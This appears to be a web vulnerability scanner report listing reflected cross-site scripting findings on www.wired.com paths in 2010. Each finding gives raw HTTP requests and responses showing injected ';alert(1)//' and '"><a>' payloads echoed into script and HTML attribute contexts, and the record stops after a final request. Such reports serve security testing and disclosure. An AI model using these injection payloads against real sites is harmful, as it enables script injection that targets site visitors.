HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.6 X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php Last-Modified: Sun, 21 Nov 2010 23:14:35 GMT Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=449 Expires: Sun, 21 Nov 2010 23:22:04 GMT Date: Sun, 21 Nov 2010 23:14:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 107877
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 11c43e3;alert(1)//d95607fec28;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1b488%3balert(1)//92eb5cb2444 was submitted in the ibypid parameter. This input was echoed as 1b488;alert(1)//92eb5cb2444 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/09/re-animators/?ibypid=101b488%3balert(1)//92eb5cb2444 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.6 X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php Last-Modified: Sun, 21 Nov 2010 23:14:39 GMT Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=467 Expires: Sun, 21 Nov 2010 23:22:26 GMT Date: Sun, 21 Nov 2010 23:14:39 GMT Connection: close Connection: Transfer-Encoding Content-Length: 110658
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 101b488;alert(1)//92eb5cb2444;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8030b%3balert(1)//54f8fbfd62 was submitted in the ibypid parameter. This input was echoed as 8030b;alert(1)//54f8fbfd62 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/09/the-molecular-pantry/?ibypid=88030b%3balert(1)//54f8fbfd62 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.6 X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php Last-Modified: Sun, 21 Nov 2010 23:14:35 GMT Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=480 Expires: Sun, 21 Nov 2010 23:22:35 GMT Date: Sun, 21 Nov 2010 23:14:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 104883
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 88030b;alert(1)//54f8fbfd62;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload dc247%3balert(1)//401a89ca126 was submitted in the ibypid parameter. This input was echoed as dc247;alert(1)//401a89ca126 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/10/buy-it-or-burn-it?ibypid=12dc247%3balert(1)//401a89ca126 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.6 X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php Last-Modified: Sun, 21 Nov 2010 23:13:45 GMT Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=438 Expires: Sun, 21 Nov 2010 23:21:03 GMT Date: Sun, 21 Nov 2010 23:13:45 GMT Connection: close Connection: Transfer-Encoding Content-Length: 105655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 12dc247;alert(1)//401a89ca126;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 99586%3balert(1)//29128e720c6 was submitted in the ibypid parameter. This input was echoed as 99586;alert(1)//29128e720c6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/10/peak-everything?ibypid=1399586%3balert(1)//29128e720c6 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.6 X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php Last-Modified: Sun, 21 Nov 2010 23:14:02 GMT Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=480 Expires: Sun, 21 Nov 2010 23:22:02 GMT Date: Sun, 21 Nov 2010 23:14:02 GMT Connection: close Connection: Transfer-Encoding Content-Length: 113826
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 1399586;alert(1)//29128e720c6;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8c5cb%3balert(1)//5e37e52b0bb was submitted in the ibypid parameter. This input was echoed as 8c5cb;alert(1)//5e37e52b0bb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/10/turkeys-and-triumphs?ibypid=148c5cb%3balert(1)//5e37e52b0bb HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.6 X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php Last-Modified: Sun, 21 Nov 2010 23:13:43 GMT Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=480 Expires: Sun, 21 Nov 2010 23:21:43 GMT Date: Sun, 21 Nov 2010 23:13:43 GMT Connection: close Connection: Transfer-Encoding Content-Length: 107511
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 148c5cb;alert(1)//5e37e52b0bb;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bc9b9%3balert(1)//3b7177fe795 was submitted in the ibypid parameter. This input was echoed as bc9b9;alert(1)//3b7177fe795 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/11/avoiding-bad-holiday-albums?ibypid=15bc9b9%3balert(1)//3b7177fe795 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.6 X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php Last-Modified: Sun, 21 Nov 2010 23:13:40 GMT Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=480 Expires: Sun, 21 Nov 2010 23:21:40 GMT Date: Sun, 21 Nov 2010 23:13:40 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106915
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 15bc9b9;alert(1)//3b7177fe795;</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e89c"><a>d3ad9ae676c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /medtech8e89c"><a>d3ad9ae676c HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29378 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:15:03 GMT Date: Mon, 22 Nov 2010 01:11:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_medtech8e89c"><a>d3ad9ae676c"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41041"><a>c86672fee37 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /medtech41041"><a>c86672fee37/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29379 Vary: Accept-Encoding Cache-Control: max-age=220 Expires: Sun, 21 Nov 2010 20:19:52 GMT Date: Sun, 21 Nov 2010 20:16:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_medtech41041"><a>c86672fee37"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6c78"><a>e49d3eb099e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /medtechc6c78"><a>e49d3eb099e/drugs HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29393 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:12:38 GMT Date: Sun, 21 Nov 2010 23:08:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_medtechc6c78"><a>e49d3eb099e ss_drugs"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c65f1"><a>11d5934ee8b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /medtech/drugsc65f1"><a>11d5934ee8b HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29393 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:08 GMT Date: Sun, 21 Nov 2010 23:09:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_medtech ss_drugsc65f1"><a>11d5934ee8b"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6e54"><a>33024249170 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /medtecha6e54"><a>33024249170/genetics HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29399 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:12:38 GMT Date: Sun, 21 Nov 2010 23:08:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_medtecha6e54"><a>33024249170 ss_genetics"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56b5c"><a>80a5cb3973b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /medtech/genetics56b5c"><a>80a5cb3973b HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29399 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:15 GMT Date: Sun, 21 Nov 2010 23:09:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_medtech ss_genetics56b5c"><a>80a5cb3973b"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0876"><a>211d7d736ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /medteche0876"><a>211d7d736ef/health HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29395 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:12:41 GMT Date: Sun, 21 Nov 2010 23:08:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_medteche0876"><a>211d7d736ef ss_health"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed9f9"><a>5052cbc9d21 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /medtech/healthed9f9"><a>5052cbc9d21 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29395 Vary: Accept-Encoding Cache-Control: max-age=549 Expires: Sun, 21 Nov 2010 23:18:22 GMT Date: Sun, 21 Nov 2010 23:09:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_medtech ss_healthed9f9"><a>5052cbc9d21"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d1ff"><a>67b5e859397 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /medtech7d1ff"><a>67b5e859397/stemcells HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29401 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:12:48 GMT Date: Sun, 21 Nov 2010 23:08:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_medtech7d1ff"><a>67b5e859397 ss_stemcells"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32e76"><a>2f9c85fc36d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /medtech/stemcells32e76"><a>2f9c85fc36d HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29401 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:21 GMT Date: Sun, 21 Nov 2010 23:09:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_medtech ss_stemcells32e76"><a>2f9c85fc36d"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af2cd"><a>0b4232b1240 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /multimediaaf2cd"><a>0b4232b1240 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
